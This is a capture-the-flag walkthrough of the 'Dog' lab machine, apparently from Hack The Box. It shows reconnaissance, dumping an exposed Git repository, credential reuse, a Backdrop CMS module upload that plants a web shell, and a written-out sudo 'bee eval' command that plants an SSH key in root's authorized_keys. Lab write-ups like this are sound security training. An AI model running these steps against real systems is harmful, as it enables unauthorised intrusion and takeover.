
Dog

Enumeration

Nmap scan of the target:

$ nmap -sV -sC -PN -oA dog_nmap -p- 10.10.11.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-23 14:18 CEST
Nmap scan report for 10.10.11.58
Host is up (0.045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Home | Dog
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The site hosted by the web server on port 80 appears to be a blog for dog owners. There is a link to a login page in the upper right corner, but no way of registering an account.

Foothold

The Nmap scan also found a publicly accessible Git repository in the web server's document root (the http-git script hit http://10.10.11.58/.git/). The entire repository can be retrieved with a tool like git-dumper (dog.htb is assumed to be mapped to 10.10.11.58 in /etc/hosts):

$ pipx install git-dumper      # installing through pipx for easier virtual environment management
$ git-dumper http://dog.htb/.git/ dog_git

The repository contains the Backdrop CMS instance running on the target:

$ ls -la dog_git
total 87
drwxrwxr-x 8 1005 autologin    13 Jun 23 15:06 .
drwxrwxr-x 3 1005 autologin     7 Jun 23 16:28 ..
drwxrwxr-x 9 1005 autologin    15 Jun 23 15:06 core
drwxrwxr-x 7 1005 autologin     9 Jun 23 15:06 files
-rwxrwxr-x 1 1005 autologin   578 Jun 23 15:06 index.php
drwxrwxr-x 2 1005 autologin     3 Jun 23 15:06 layouts
-rwxrwxr-x 1 1005 autologin 18092 Jun 23 15:06 LICENSE.txt
-rwxrwxr-x 1 1005 autologin  5285 Jun 23 15:06 README.md
-rwxrwxr-x 1 1005 autologin  1198 Jun 23 15:06 robots.txt
-rwxrwxr-x 1 1005 autologin 21732 Jun 23 15:06 settings.php
drwxrwxr-x 2 1005 autologin     4 Jun 23 15:06 sites
drwxrwxr-x 2 1005 autologin     3 Jun 23 15:06 themes

The settings.php file is particularly interesting: it contains the connection string, including the password, for the application database (the password is elided in the excerpt below):

<?php
/**
 * @file
 * Main Backdrop CMS configuration file.
 */

...
$database = 'mysql://root:Back ... @127.0.0.1/backdrop';
$database_prefix = '';

Backdrop keeps its active configuration as JSON files under files/config_*/active/, so the repository also leaks site settings. Recursively grepping it for dog.htb turns up a potential username:

$ cd dog_git && grep -R dog.htb .
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000  commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000     commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases

Using the username tiffany@dog.htb and the database password from settings.php (reused for the CMS account), the Backdrop admin panel can be accessed.

According to the Status report page, the target runs Backdrop CMS 1.27.1. Searching for vulnerabilities in this version turned up a PoC for authenticated remote code execution. The issue is really a feature abuse: any account allowed to install modules can upload an archive containing arbitrary PHP, which Backdrop unpacks into the web root and Apache then serves.

The exploit creates a fake Backdrop module with a web shell payload. Once installed on the target (Functionality > Install new modules > Manual installation), the shell can be reached at http://dog.htb/modules/shell/shell.php.

With a Netcat listener running, a reverse shell payload was submitted through the web shell; the callback arrived as www-data.

Privilege Escalation (User)

There are two home directories under /home:

www-data@dog:/var/www/html/modules/shell$ ls /home
jobert
johncusack

The database password from settings.php is also valid for the local account johncusack (the same password is reused for the database and a system user).

Got the user flag.

Privilege Escalation (root)

User johncusack may run /usr/local/bin/bee as root via sudo:

johncusack@dog:~$ sudo -l
...
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

According to its documentation, bee is a CLI tool for managing Backdrop. Among the usual management functions it also has a command for running arbitrary PHP code:

...
  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
...

Because sudo runs bee as root, eval executes the supplied PHP as root, which is a direct path to privilege escalation.

An initial attempt to run a PHP reverse shell from eval (connecting back to a Netcat listener) did not work. Instead, an SSH key pair was generated and its public key written to /root/.ssh/authorized_keys with the following eval command:

johncusack@dog:~$ sudo bee eval '$myfile = fopen("/root/.ssh/authorized_keys", "w"); $txt = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINbuEe4FxXhIRFqe3ZZKtRFLOEs/1RIKHsjH+krlBqKy"; fwrite($myfile, $txt);'

Connected to the target over SSH as root and got the root flag. Note that opening the file with mode "w" truncates any existing authorized_keys; on a real engagement, opening it with "a" and appending the key with a trailing newline is the less destructive option.